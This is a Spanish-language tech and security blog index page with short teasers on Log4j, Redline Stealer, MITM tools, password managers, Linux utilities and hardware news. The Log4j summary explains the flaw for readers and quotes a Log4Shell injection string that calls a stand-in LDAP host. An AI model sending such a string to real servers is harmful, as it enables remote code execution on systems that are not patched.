Tienda Wifi

Tienda Wifi
CiudadWireless es la tienda Wifi recomendada por elhacker.NET

Entradas Mensuales

Síguenos en:

Canal Oficial Telegram de elhacker.NET Grupo Facebook elhacker.NET Twitter elhacker.NET Canal Youtube elhacker.NET Comunidad Steam: Grupo elhacker.NET

Suscripción

¿Quieres recibir las últimas novedades del blog en tu correo?

¡Suscríbete al feed!

PostHeaderIcon Tecnología de Intel permite actualizar la BIOS de un sistema Linux sin tener reiniciar


Intel está terminando el desarrollo de la función Platform Firmware Runtime and Telemetry Drivers (PFRUT), que combinado con el kernel de Linux 5.17, permite al sistema operativo actualizar el firmware del sistema, como la UEFI o la BIOS de una placa base, sin necesidad de reiniciar el sistema con el fin de eliminar el tiempo de inactividad.





PostHeaderIcon La Universidad de Kioto en Japón pierde 77TB de datos tras un error en la copia de seguridad


La Universidad de Kioto, uno de los principales institutos de investigación de Japón, está de luto, y es que lo que debería ser algo tan rutinario como realizar una copia de seguridad, derivó en la pérdida de aproximadamente 34 millones de archivos pertenecientes a 14 grupos de investigación diferentes que habían estado utilizando el sistema de supercomputación de la escuela. Es decir, que perdieron nada menos que 77 terabytes de datos en este procedimiento rutinario.



PostHeaderIcon Redline Stealer es un malware que roba las contraseñas guardadas del navegador


Por comodidad, son muchos los usuarios que guardan sus contraseñas a través de las herramientas que ofrecen navegadores como Chrome, Edge, Safari y demás. Un almacén al que acceder fácilmente a las contraseñas sin tener que preocuparnos de acordarnos de ellas. Sin embargo, esto puede ser un arma de doble filo, ya que los gestores de contraseñas de nuestro navegador pueden no ser la mejor opción, y el malware  'Redline Stealer' lo demuestra.





PostHeaderIcon ¿Qué es un dropper? (Malware)


Los droppers son un subtipo de malware que tiene la finalidad de “droppear” (del inglés dropper, que significa liberar) otro archivo ejecutable malicioso. Al igual que las amenazas del tipo troyano, categoría en la cual están incluidos los droppers, a simple vista puede verse como inofensivo, hasta que recibe la orden de descargar el malware en cuestión. Usualmente, este tipo de malware suele incluirse dentro de archivos comprimidos enviados como adjuntos en correos de phishing.




PostHeaderIcon Fundador de Signal asegura que Telegram es incluso menos seguro que Facebook Messenger


Moxie Marlinspike, fundador de Signal, una plataforma de mensajería que se hizo popular por asegurar a sus usuarios una gran privacidad ha dicho en Twitter que le sorprende que muchos medios sigan hablando de Telegram como una herramienta de "mensajería encriptada". Considera que, aunque Telegram ofrece muchas características atractivas, "no hay una opción peor en lo que respecta a la privacidad y la recopilación de datos", ha dicho Marlinspike. Ya que Telegram no utiliza por defecto el cifrado de extremos a extremo, excepto si usas los Chats Secretos.





PostHeaderIcon Diferencias entre el cifrado BitLocker y EFS en Windows


Generalmente consideramos que los archivos almacenados en nuestros discos duros están seguros ya que están protegidos por la contraseña de inicio de sesión. No obstante, si nos roban el ordenador o el disco duro podrían estar en peligro. Así, por ejemplo, retirando ese disco duro y conectándolo a otro equipo podría ver el contenido que tenemos almacenado. Una de las herramientas gratuitas que podemos utilizar para esta tarea es VeraCrypt, aunque hay que señalar que Windows también tiene 2  sistemas de cifrado nativos que son BitLocker y EFS, con sus respectivas características y diferencias.





PostHeaderIcon Mejores programas para reparar, recuperar y ver información de un disco duro dañado


 Dentro de las diferentes desgracias que le puede ocurrir a un PC, la avería del disco duro es una de las peores. No solo porque podamos perder los datos que teníamos almacenados (que también), sino porque que además en el peor de los casos tendremos que comprar un disco nuevo, desmontar el ordenador y sustituirlo. Lo ideal es clonar la unidad afectada para poder trabajar con ella con total seguridad.




PostHeaderIcon TWRP Recovery para teléfonos Android


 TWRP Custom Recovery para Smartphones Android. Una guía completa e imprescindible para personalizar tu Smartphone y hacer un poco de modding. Este programa es indispensable para hacerte usuario root e instalar una ROM personalizada.





PostHeaderIcon Herramientas para realizar ataques Man‑in‑the‑Middle (MITM)


 Man-in-the-Middle (MitM), que en español significa “hombre en el medio”, es un tipo de ataque destinado a interceptar, sin autorización, la comunicación entre dos dispositivos (hosts) conectados a una red. Este ataque le permite a un agente malintencionado manipular el tráfico interceptado de diferentes formas, ya sea para escuchar la comunicación y obtener información sensible, como credenciales de acceso, información financiera, etc., o para suplantar la identidad de alguna de las partes




PostHeaderIcon Vulnerabilidad en Azure App Service expone repositorios Git desde hace 4 años


 Se ha descubierto un fallo de seguridad en Azure App Service de Microsoft que resultó en la exposición del código fuente de las aplicaciones de los clientes escritas en Java, Node, PHP, Python y Ruby durante al menos cuatro años desde septiembre de 2017. Microsoft soluciona error NotLegit que permitía ver el código fuente de las apps utilizando "Local Git" en Azure App Service para Linux  en App escritas PHP, Python, Ruby o Node ya que repositorio local “/.git” era visible públicamente.





PostHeaderIcon Las 20 mejores herramientas de Hacking de 2021


 En un ranking elaborado por Kitploit, nos muestran las 20 herramientas más populares (con más visitas) durante el 2021. Es una lista que merece ser revisada, donde se encuentran herramientas de diferentes desarrolladores quienes dedican su tiempo y esfuerzo a colaborar con la comunidad.  Destacan herramientas de Information Gathering, ingeniería social (phishing), entre otras




PostHeaderIcon Procesadores Intel 12th Alder Lake para el chipset Z690, H670, B660 y H610


Una placa base Z690 puede ser tu mejor aliada para las nuevas CPU Intel Core de 12ª generación (Alder Lake). Estamos ante unos procesadores con un socket totalmente nuevo, el LGA1700, y que además estrenan el soporte para memorias DDR5. Son toda una revolución que marcará el mercado del PC en toda esta nueva década, por lo que comprar una buena placa base es algo más importante que nunca.

 



PostHeaderIcon Alertan de una importante Campaña Phishing vía SMS clientes mensajería MRW


Se ha detectado una campaña de SMS fraudulentos (smishing) suplantando a la compañía de envíos MRW. La propia empresa a través de su perfil oficial de Twitter informa estar sufriendo una campaña de smishing donde tratan de suplantarles pero utilizando DATOS REALES como NOMBRE Y APELIDOS. A través de estos SMS fraudulentos, se envía un localizador de envío al usuario con un enlace que le redirige a una página fraudulenta con el fin de que pague unos supuestos gastos de envío de un paquete enviado por MRW. El dominio envios-mrw.[]com no es de MRW, es FALSO. El mensaje te dice que tienes que abonar los gastos de un envío que estas esperando y que para hacerlo tienes que ingresar en una URL donde te explican cómo hacer el pago.




PostHeaderIcon Extensiones Visual Studio Code para programar en C o C++


Gracias a los IDE de programación (una serie programas diseñados para ayudarnos a programar de manera más eficiente, con menos errores, y con distintas ayudas y sistemas de detección y corrección de errores) los programadores pueden llevar a cabo sus proyectos de manera más eficiente y con menos probabilidades de cometer fallos y errores. Y, cuanto más especializado esté ese IDE en el lenguaje que vamos a utilizar, mucho mejor. Visual Studio Code es un programa es un editor de texto plano desarrollado por Microsoft como software OpenSource y totalmente gratuito para todo tipo de usuarios para que cualquiera programar en prácticamente cualquier lenguaje.





PostHeaderIcon ¿Qué es una APU y un SoC?


 Todos sabemos que la CPU es la Unidad Central de Procesamiento (Central Processing Unit) y se asemeja al cerebro del ordenador, manejando la mayor parte del procesamiento. Sin embargo, las CPU no suelen ser muy buenas haciendo los cálculos para los gráficos.



PostHeaderIcon Crean un algoritmo capaz de adivinar el 41% de las veces tu PIN del cajero


Investigadores de la Universidad de Padua, en Italia, han encontrado cómo entrenar a un algoritmo de deep learning para que adivine el número secreto de cuatro dígitos de las tarjetas de crédito, incluso aunque se haya puesto la mano encima para taparlo.  La tasa de éxito por ahora no es demasiado elevada (41%), pero es suficiente para dar algún que otro susto a los clientes de las entidades bancarias. 





PostHeaderIcon DuckDuckGo, la alternativa al buscador Google basado en la privacidad, bate récords


 Mejorar la privacidad al navegar es algo que tienen muy en cuenta cualquiera que entre en una página, se registre en un foro o haga simplemente una búsqueda en la red. Y la mejor prueba la tenemos con el uso de DuckDuckGo, que es la alternativa a Google más popular para evitar que los datos personales puedan filtrarse. De hecho, ha vuelto a batir récords. Esto no hace más que confirmar que la privacidad importa, y mucho.





PostHeaderIcon Instalar MacOS Big Sur en una máquina Virtual con VirtualBox


¿Está interesado en ejecutar macOS Big Sur o Monterey desde una PC con Windows? Si no quieres gastar dinero en una Mac, puedes usar una máquina virtual y aun así probar macOS, gracias a VirtualBox. Ejecutarás VirtualBox de forma nativa en su computadora con Windows e instalará macOS como un sistema operativo invitado dentro de VirtualBox.





PostHeaderIcon Editores de imágenes de vídeo gratuitos y de código libre


El software libre es un movimiento político y social que lucha por la libre disponibilidad, estudio, modificación y redistribución del código fuente empleado en programas y aplicaciones. Fue definido oficialmente en 1986, cuando Richard Stallman estableció las conocidas cuatro libertades (la cero fue añadida después), pero ya existía de facto debido a que el proyecto GNU echó a andar en 1983 y a que en décadas anteriores no era raro que el código fuente fuera compartido entre distintos desarrolladores.





PostHeaderIcon Desinstalar todas las aplicaciones no deseadas que se incluyen por defecto en Windows 10 y 11


Hasta que Microsoft tome conciencia de la conveniencia de ofrecer un Windows 10 limpio como están pidiendo sus usuarios, el Bloatware campa a sus anchas por el ecosistema . Candy Crush, Spotify, Trip Advisor, Bubble Witch 3 Saga, Amazon, Disney Magic Kingdoms, Netflix, Skype, Cooking Fever, Fitbit Coach… la lista de aplicaciones incluidas por Microsoft en Windows 10 es ya interminable. O&O AppBuster es una app gratuita, portable y fácil de usar, además extremadamente ligera. El archivo .exe pesa poco más de 1 MB,




PostHeaderIcon Reparar tarjeta memoria SD dañada o estropeada


Las memorias o tarjetas micro SD se han vuelo tremendamente populares en los últimos tiempos, y como herramienta de uso diario que son, no son pocas las que se averían, se corrompen o simplemente fallan y dejan de funcionar.




PostHeaderIcon Instalar aplicaciones Android en Windows 11: WSATools y WSAPacman


Una de las mejores cosas que le ha pasado a Windows en los últimos años es la posibilidad de instalar y ejecutar aplicaciones Android de forma nativa. Con Windows 11 ya no es necesario instalar un emulador de Android para PC, ya que ahora el sistema es capaz de correr este tipo de apps móviles.



PostHeaderIcon Hackean servidores HP con CPUs AMD EPYC para minar Raptoreum gracias a la vulnerabilidad Log4Shell


Raptoreum, es noticia debido a que los servidores HP, dotados de procesadores AMD EPYC, han sido hackeados aprovechando que eran vulnerables al exploit Log4J, lo que permitió que los atacantes accedieran a estos sistemas para aprovechar el enorme potencial de las CPUs EPYC para minar esta criptomoneda. Extraen más de $ 100,000 en 8 días




PostHeaderIcon Logrotate: administra los registros (logs) de tu sistema Linux


En el mundo de los sistemas UNIX y GNU/Linux tiene un buen puñado de herramientas increíbles, que facilitan el día a día de las personas administradoras de sistemas. Una de ellas es logrotate. Esta utilidad implementa una variedad de políticas de administración de registros y es estándar en todas las distribuciones GNU/Linux. También se puede instalar, si así se desea, en sistemas Solaris, HP-UX o AIX





PostHeaderIcon Las mejores shells para GNU/Linux


Las mejores shell para GNU/Linux. En nuestros sistemas favoritos, comparados con otros privativos, es mucho más frecuente utilizar la consola de comandos, con más motivo aún si eres desarrollador o administrador de sistemas. Las shell de las que vamos a hablar son las más populares, estas son tsch, fish, Korn Shell, Z Shell y como no, Bash.





PostHeaderIcon Glosario términos en Linux: vocabulario básico


Con cada nuevo año que entra, o días antes de hacerlo como ahora, se suelen leer artículos que aseguran que este será el año de Linux. , Un glosario Linux, lo que no es más que una lista de palabras con una definición que pretende ser clara, corta y concisa. Las pondremos en orden alfabético, 




PostHeaderIcon Windows 10 versión 21H2 añade protecciones mejoradas contra ransomware y malware


Microsoft sigue apostando por la seguridad en su plataforma Windows y su última propuesta está encaminada para ayudar a los administradores de sistemas y que estos determinen si la configuración que tienen aplicada es la idónea tomando como referencia las recomendadas por Microsoft. Gracias a Microsoft Security Compliance Toolkit, un conjunto de opciones de configuración desarrolladas en base a las aportaciones tanto de los equipos de ingeniería de la empresa pero también por partners y clientes.





PostHeaderIcon Instalar varios sistemas operativos autoarrancables en un pendrive


 Tener una unidad pendrive USB desde la cual podamos arrancar un sistema operativo u otro puede ser verdaderamente interesante. Gracias a una unidad de USB, podremos llevar varias distribuciones de Linux o distintos sistemas de instalación de Windows, para de esta manera lograr tener diferentes formas de arrancar nuestro ordenador desde fuerza del almacenamiento interno del mismo.

 



PostHeaderIcon Vulnerabilidad test de antígenos permite falsificar el resultado mediante Bluetooth


 Una investigación del proveedor de ciberseguridad F-Secure ha encontrado y ayudado a corregir fallos de diseño de un test doméstico de antígenos para detectar la COVID-19 de la marca Ellume. Los fallos descubiertos habrían permitido a un individuo falsificar un resultado certificable de la prueba a través de Bluetooth. Ellume cuenta con la autorización de ser usada en caso de emergencia en Estados Unidos para diagnosticar coronavirus.





PostHeaderIcon Actualización de seguridad importante servidor web httpd Apache 2.4.51 e inferiores (mod_lua y ProxyRequests)


 El 20 de diciembre de 2021, Apache emitió oficialmente un aviso de seguridad para corregir múltiples vulnerabilidades. Los números de vulnerabilidad incluidos son: CVE-2021-44224, CVE-2021-44790, el nivel de vulnerabilidad es de alto riesgo. La primera vulnerabilidad sólo afecta si tenemos la directiva ProxyRequests On y la segunda si usamos el módulo mod_lua activado (por defecto se encuentra deshabilitado). Las dos vulnerabilidades se encuentran corregidas en Apache 2.4.52. No se conocen exploits públicos por el momento.


 


PostHeaderIcon Graves vulnerabilidades plugin SEO instalado en más de 800 mil webs de WordPress


 La seguridad de unos 800.000 sitios web que utilizan WordPress está en peligro. El popular complemento All in One SEO, que es empleado por más de 3 millones de sitios web para mejorar el posicionamiento en motores de búsqueda, presenta dos vulnerabilidades críticas. Las mismas han sido abordas en una actualización lanzada el pasado 7 de diciembre, pero los webmasters están tardando en aplicar este parche.

 


 


PostHeaderIcon Vulnerabilidades Directorio Activo permiten hackear controlador de dominio en Windows


 Microsoft ha publicado un aviso fuera de ciclo de dos vulnerabilidades publicadas en noviembre y que, combinadas, podrían permitir a un atacante la escalada de privilegios de dominio. Las pruebas de concepto se han dado a conocer públicamente en diciembre.La cadena de vulnerabilidades (NoPaC, sAMAccountName) que está pasando algo desapercibida pero mediante la cual cualquier persona dentro de la red podría usar para hackear un DC. Hablamos de CVE-2021-42287 y CVE-2021-42278




PostHeaderIcon Ministerio de Defensa de Bélgica es el primer país víctima de la vulnerabilidad Log4j


La vulnerabilidad Log4Shell parece estar lejos de dejar de ser un dolor de cabeza para gran parte de las plataformas de Internet. Grupos de ciberdelincuentes intentan explotarla miles de veces por segundo y, en ocasiones, consiguen lo que buscan. El Ministerio de Defensa de Bélgica se ha convertido en el primer país de la OTAN en ser victima de este fallo de seguridad.

 



PostHeaderIcon La memoria DDR5 es apenas un 3% más rápida que la DDR4 y es más del doble de cara


 La memoria RAM DDR5 se presentó como gran novedad, pero DDR4 sigue siendo competitiva y el impacto en videojuegos es muy pequeño. La noticia se centra en las memorias DDR5 de 6000 MHz y aquellas DDR4 a 3.200 MHz, ¡solo un 2% más de FPS! De 129,19 FPS a 133,44 FPS en juegos populares cuando el precio es más del doble. 32GB de DDR4 cuestan unos 150€, mientras que el mismo kit 32GB en DDR5, más del doble, el precio mínimo de 470€.

 



PostHeaderIcon Actualizaciones de Windows 11 solucionan problemas rendimiento y cuelgues inesperados


 Microsoft reconoció recientemente la existencia de dos errores en Windows 11 que podían provocar, en ciertas situaciones, pérdidas importantes de rendimiento, que se manifestaban en forma de ralentizaciones muy marcadas que afectaban a las unidades SSD, y también generaban cierres espontáneos de ciertas aplicaciones, lo que conocemos popularmente como «crasheos».



PostHeaderIcon Disponible distro Hacking WiFi Wifislax de origen Español edición final 2021


 Wifislax64 es la versión de la popular distribución de origen Español basada en Linux Slackware creada por USUARIONUEVO que mantiene viva la comunidad de SeguridadWireless. Se trata de un sistema operativo muy utilizado para realizar pruebas en redes inalámbricas, comprobar la seguridad de claves Wi-Fi al disponer de una gran cantidad de diccionarios WPA y WPA2 de los populares routers. Incluye actualizaciones para Firefox 95, Chrome 96, Tor 11 , Websploit 4.0 , Kodi , Wine , Burp Suite LibreOffice, Social Engineer Toolkit (SET) 8.0.3, Metasploit kit-6.1.20, etc



PostHeaderIcon DuckDuckGo prepara navegador web que protegerá la privacidad y será más rápido que Chrome


DuckDuckGo es una de las mejores herramientas web enfocadas en la privacidad. Con el correr de los años el buscador se ha ganado unos cuantos halagos, que posteriormente se trasladaron a su aplicación para móviles. Y muy pronto se podrá disfrutar de dichas características en un navegador web de escritorio.

 




PostHeaderIcon Amazon patenta una red de cámaras que reconcen a personas "sospechosas"


Amazon quiere crear una serie de red de cámaras que reconozcan a las personas consideradas "sospechosas": Estas son todas las patentes que podrían hacerlo posible Ring, empresa adquirida por Amazon que vende sistemas de timbres para casas con cámaras de vigilancia integradas, ha estado investigando el reconocimiento facial y otras tecnologías de identificación biométrica. La empresa por ahora no ofrece estas capacidades, pero las patentes presentadas sugieren que es una posibilidad en el futuro. Pero la patente describe la posibilidad de que las personas envíen una alerta dentro de una aplicación a los vecino.

 



PostHeaderIcon Los mitos más comunes en ciberseguridad


Incluso con la creciente conciencia sobre la ciberseguridad, prevalecen muchos mitos al respecto. Estos conceptos erróneos pueden ser una barrera para la seguridad efectiva. El primer paso para garantizar la seguridad de su negocio es separar la información falsa, los mitos y los rumores de la verdad.


 


PostHeaderIcon Hospital de Asturias (España) afectado por un ataque de ransomware


Desde el comienzo de la pandemia los hospitales han protagonizado diversos casos de ataques ransomware. El ataque ransomware causa estragos en el hospital más importante de Asturias: obliga a posponer citas y a reinstalar el software, La caída del sistema colapsó los equipos que monitorizan la pandemia y que organizan la realización de PCR. No es la primera vez que los ciberatacantes apuntan hacia el sistema sanitario. A principios de 2020 conocimos el del Hospital de Torrejón y en septiembre del año pasado otro ataque provocaba colapsos en el Moisès Broggi de Barcelona




PostHeaderIcon Cable USB llamado BusKill permite borrar automáticamente contenido del portátil en caso pérdida o robo


Ya sea por robo o pérdida.el proyecto BusKill evita que la información del usuario quede al aire si tiene un problema de este tipo. En concreto, mediante el empleo de un 'gadget' USB que permite bloquear el ordenador en caso de acabar desconectado e incluso provocar que queden destruidos ante amenazas.


 


PostHeaderIcon El hackeo con Pegasus para iPhone es uno de los ataques más sofisticados de la historia


 El hackeo de Pegasus iPhone ahora parcheado se encuentra entre los ataques más sofisticados vistos en los últimos años. Los empleados de Google de Project Zero lo han descrito como «uno de los exploits técnicamente más sofisticados» que jamás hayan visto después de estudiar el exploit de seguridad de iMessage que ha aparecido repetidamente en los titulares. Dicen que la infame herramienta del Grupo NSO está a la par de lo que cabría esperar de las herramientas de espionaje de los estados nacionales




PostHeaderIcon Resumen de todas las vulnerabilidades de Log4j


Las versiones de Log4j anteriores a 2.16.0 están sujetas a una vulnerabilidad de ejecución remota de código a través del analizador ldap JNDI. El resumen de la vulnerabilidad anterior es que un servidor que utilice la librería de java vulnerable, cuando reciba una petición en alguno de los campos que necesitaría tratar (el User-Agent en este caso), parsearía el contenido (${variable} => ${jndi:ldap://evil.xa/x}), entraría log4j para su tratamiento, realizaría la query ldap hacia el destino (evil.xa) y éste le respondería con la clase maliciosa ejecutando el código existente en la misma.

 

 



PostHeaderIcon Instalación LineageOS en teléfonos Android


 Tanto si te quieres cambiar de sistema operativo o saber qué ofrece este programa, te hablaremos sobre la alternativa Open Source para teléfonos móviles y cómo tenerla en tu dispositivo. Éste, es un tutorial sencillo que trata de esquivar técnicismos para facilitar cambiar tú terminal de S.O.





PostHeaderIcon Gestores de Contraseñas para Android


 Nuestro smartphone Android puede hacer muchas cosas y una de ellas es generar, proteger y usar contraseñas seguras. Un tres en uno que nos ayuda a organizar mejor esta información y a usarla de manera más óptima para evitar que otros puedan entrar a nuestras cuentas. Hay muchos gestores de contraseñas si buscamos en Google Play pero sólo unos pocos son los que luchan para quedarse en nuestro móvil. La variedad es buena y con la lista que os traemos hoy, elijas lo que elijas vas a encontrar una aplicación competitiva.

 


 


PostHeaderIcon Guía SysAdmin para SELinux


 Desde hace un tiempo los administradores de sistemas y también los usuarios domésticos nos hemos tenido que acostumbrar a trabajar con SELinux; seguro habrán oído de él, ese módulo de seguridad, medio desconocido y que por norma todos nos dicen que deshabilitamos recién hemos instalado el sistema operativo en turno.





PostHeaderIcon Gestores de contraseñas gratuitos


Un gestor de contraseñas es, fundamentalmente, un almacén digital cifrado que almacena a buen recaudo información de inicio de sesión de diversos servicios online. A partir de ese concepto básico, podemos ir sumando características que refuerzan su utilidad: sincronización entre dispositivos, contraseñas maestras, etc.




PostHeaderIcon Configurar servidor DLNA para reproducir música y peliculas


DLNA es un servidor multimedia (video, audio y fotos) muy ligero, ya que simplemente hará una transferencia del archivo solicitado.

 

 


PostHeaderIcon Instalar Kali Linux en tu teléfono móvil con NetHunter


 Nethunter es la solución móvil de Kali LinuxEs un proyecto Open Source para Android y por supuesto para dispositivos que corren bajo ese sistema operativo. Ha sido desarrollado en conjunto por Offensive Security y por un miembro de la comunidad, conocido como “BinkyBear”No es compactible con Iphone y su sistema operativo IOS. Según su página oficial y traducido al español, Nethunter nos proporciona lo siguiente:





PostHeaderIcon pfetch, screenfetch o neofetch : mostrar información del sistema en Linux


Neofetch, screenFetch, o pfetch te permiten visualizar el logo de tu distro e información completa en tu terminal.